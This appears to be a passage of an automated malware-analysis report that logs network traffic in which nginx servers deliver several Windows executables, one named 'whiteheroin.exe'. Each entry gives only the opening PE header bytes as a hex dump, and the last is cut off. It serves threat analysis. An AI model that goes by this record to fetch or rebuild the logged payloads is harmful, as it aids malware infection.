00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:58:59 GMTContent-Type: application/octet-streamContent-Length: 1822720Last-Modified: Wed, 26 Jun 2024 15:53:49 GMTConnection: keep-aliveETag: "667c398d-1bd000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 04 93 d3 c8 40 f2 bd 9b 40 f2 bd 9b 40 f2 bd 9b 93 80 be 9a 51 f2 bd 9b 93 80 b8 9a e9 f2 bd 9b 93 80 b9 9a 56 f2 bd 9b 82 73 b9 9a 52 f2 bd 9b 93 80 bc 9a 47 f2 bd 9b 40 f2 bc 9b c6 f2 bd 9b 82 73 b8 9a 1c f2 bd 9b 82 73 be 9a 58 f2 bd 9b b3 70 b8 9a 41 f2 bd 9b b3 70 bf 9a 41 f2 bd 9b 52 69 63 68 40 f2 bd 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 31 eb 7b 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 27 00 12 02 00 00 ca 19 00 00 00 00 00 e8 96 00 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 1c 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ac d9 02 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 1b 00 28 21 00 00 a8 ae 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 af 02 00 18 00 00 00 e8 ad 02 00 40 00 00 00 00 00 00 00 00 00 00 00 00 30 02 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f2 03 02 00 00 10 00 00 00 04 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 42 73 53 00 00 00 00 6d 0d 00 00 00 20 02 00 00 0e 00 00 00 08 02 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 7a b2 00 00 00 30 02 00 00 b4 00 00 00 16 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 94 f3 18 00 00 f0 02 00 00 e4 18 00 00 ca 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 28 21 00 00 00 f0 1b 00 00 22 00 00 00 ae 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:03 GMTContent-Type: application/octet-streamContent-Length: 304128Last-Modified: Wed, 26 Jun 2024 16:01:49 GMTConnection: keep-aliveETag: "667c3b6d-4a400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f5 1f ce b6 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 d0 02 00 00 d0 01 00 00 00 00 00 ca 9f 02 00 00 20 00 00 00 00 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 78 9f 02 00 4f 00 00 00 00 00 03 00 d4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 04 00 0c 00 00 00 5c 9f 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b0 cf 02 00 00 20 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d4 c9 01 00 00 00 03 00 00 cc 01 00 00 d4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 04 00 00 04 00 00 00 a0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKContent-Disposition: attachment; filename=whiteheroin.exeContent-Type: application/octet-streamContent-Length: 1228288Last-Modified: Wed, 26 Jun 2024 19:22:36 GMTCache-Control: no-cache, max-age=0Expires: Thu, 27 Jun 2024 03:59:15 GMTETag: "1719429756.5317302-1228288-125308486"Date: Thu, 27 Jun 2024 03:59:15 GMTServer: nginxConnection: keep-aliveX-Frame-Options: SAMEORIGINData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 01 4e 7c 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 e8 0e 00 00 0a 00 00 00 00 00 00 0e 06 0f 00 00 20 00 00 00 20 0f 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 13 00 00 04 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c0 05 0f 00 4b 00 00 00 00 e0 12 00 e0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 88 10 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 e6 0e 00 00 20 00 00 00 e8 0e 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 5f 4c 57 00 00 00 00 f4 bd 03 00 00 20 0f 00 00 be 03 00 00 f6 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 06 00 00 00 e0 12 00 00 08 00 00 00 b4 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 13 00 00 02 00 00 00 bc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be r
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:20 GMTContent-Type: application/x-msdos-programContent-Length: 1106998Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:26 GMTContent-Type: application/x-msdos-programContent-Length: 685392Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:28 GMTContent-Type: application/x-msdos-programContent-Length: 608080Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:28 GMTContent-Type: application/x-msdos-programContent-Length: 450024Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Thu, 27 Jun 2024 03:59:29 GMTContent-Type: application/x-msdos-programContent-Length: 2046288Connection: keep-aliveLast-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 